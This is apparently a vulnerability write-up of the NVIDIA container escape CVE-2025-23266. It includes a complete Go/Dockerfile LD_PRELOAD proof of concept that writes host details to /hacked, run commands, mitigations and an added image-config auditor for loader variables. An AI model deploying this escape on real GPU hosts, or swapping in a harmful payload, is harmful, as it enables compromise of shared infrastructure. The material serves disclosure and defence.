NvidiaScape: CVE-2025-23266 – Easy Container Escape in NVIDIA AI Enterprise (with Go-based Exploit PoC)
Discovered by: Wiz Research
PoC Author: jpts
Published: July 2025
Severity: Critical (Container Escape → Host Compromise)
🧠 Summary (for Everyone)
CVE-2025-23266, also called NvidiaScape, is a critical vulnerability in NVIDIA AI Enterprise containers that allows attackers to break out of a GPU container and run code on the host machine.
If you're using NVIDIA AI containers with GPU acceleration, and the environment is misconfigured (e.g., `LD_PRELOAD` not restricted), a malicious `.so` file can execute host-level code, letting an attacker escape the container sandbox.
🛠️ How the Exploit Works
The vulnerability comes down to this:
- Containers using the NVIDIA runtime pass the GPU access and preload settings to user-space.
- No restriction is applied to `LD_PRELOAD`, so an attacker can preload a malicious `.so` file.
- The preload file runs when the container starts — but on the host, not just inside the container.
The result? The container breaks free and touches the host filesystem.
🚀 Running the PoC (Go-Based Exploit)
Thanks to jpts, there's a working exploit using Go, compiled to a shared object. Here's a breakdown of the components.
🔧 Dockerfile
```dockerfile
FROM golang:1.23 AS build
WORKDIR /build
COPY . .
RUN go build -buildmode=c-shared -o poc.so

FROM busybox:stable-glibc
ENV NVIDIA_VISIBLE_DEVICES=all
ENV LD_PRELOAD=/proc/self/cwd/poc.so
COPY --from=build /build/poc.so /poc.so
```
This creates a shared object (`poc.so`) that will be preloaded when the container runs.
💡 main.go – The Payload
```go
package main

// extern void onload();
//
// __attribute__((constructor))
// __attribute__((weak))
// void load() {
//     onload();
// }
import "C"

import (
	"fmt"
	"os"
	"os/user"
)

//export onload
func onload() {
	host, _ := os.Hostname()
	user, _ := user.Current()
	msg := []byte(fmt.Sprintf("host: %s\nuid: %s (%s)\n", host, user.Uid, user.Username))
	_ = os.WriteFile("/hacked", msg, 0644)
}

func main() {}
```
This code runs on container start and writes host information to `/hacked`, proving host access.
🧾 go.mod
```
module github.com/jpts/cve-2025-23266-poc

go 1.23.9
```
▶️ Usage
To run the exploit in your test lab:
```bash
git clone https://github.com/jpts/cve-2025-23266-poc
cd cve-2025-23266-poc
docker build -t poc .
docker run --rm --runtime=nvidia poc
```
After running, check the host filesystem for `/hacked`. If the file appears, the exploit succeeded.
🔒 Mitigation
- Upgrade NVIDIA AI Enterprise to the latest patched versions.
- Enforce container runtime flags that restrict `LD_PRELOAD`.
- Ensure container isolation using runtime security tools (AppArmor, SELinux).
- Avoid passing arbitrary host access to GPU containers.
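One way to act on the `LD_PRELOAD` restriction before a container ever starts is to audit image metadata at admission time. The following is an added example, not part of the original post or of jpts's PoC: the helper name `AuditImageEnv` is hypothetical, the sample config is constructed to mirror the `ENV` lines of the Dockerfile above, and treating an empty or `void` value of `NVIDIA_VISIBLE_DEVICES` as "no GPU requested" is an assumption of this sketch.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Constructed sample: image config matching the ENV lines of the Dockerfile above.
const sampleConfig = `{"config":{"Env":["PATH=/bin","NVIDIA_VISIBLE_DEVICES=all","LD_PRELOAD=/proc/self/cwd/poc.so"]}}`

// loaderVars: glibc dynamic-loader variables that make any process inheriting
// them load extra code. LD_LIBRARY_PATH is left out because CUDA images set it.
var loaderVars = map[string]bool{"LD_PRELOAD": true, "LD_AUDIT": true}

// Finding is one reason to keep an image off GPU nodes.
type Finding struct {
	Var, Value string
	GPUImage   bool // image also asks the NVIDIA runtime for GPU injection
}

// AuditImageEnv (hypothetical helper) parses an OCI image config and reports
// loader variables baked into the image environment.
func AuditImageEnv(raw []byte) ([]Finding, error) {
	var ic struct {
		Config struct{ Env []string } `json:"config"`
	}
	if err := json.Unmarshal(raw, &ic); err != nil {
		return nil, fmt.Errorf("parse image config: %w", err)
	}
	var found []Finding
	gpu := false
	for _, kv := range ic.Config.Env {
		name, val, _ := strings.Cut(kv, "=")
		if name == "NVIDIA_VISIBLE_DEVICES" && val != "" && val != "void" {
			gpu = true // assumption: any other value requests the NVIDIA runtime path
		}
		if loaderVars[name] {
			found = append(found, Finding{Var: name, Value: val})
		}
	}
	for i := range found {
		found[i].GPUImage = gpu // set after the loop: ENV order is arbitrary
	}
	return found, nil
}

func main() {
	fmt.Println(AuditImageEnv([]byte(sampleConfig)))
}
```

A non-empty result with `GPUImage` set is the combination the PoC image relies on, so it is the case to block or alert on; this check complements patching and does not replace it.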
🧠 Final Thoughts
This exploit is incredibly simple yet powerful — no kernel exploit, no privilege escalation, just a shared library and a Dockerfile. It highlights why even small misconfigurations in AI/ML infrastructure can have massive consequences.
If you're running AI workloads in containers with GPU access — test this PoC in your lab, and patch immediately in production.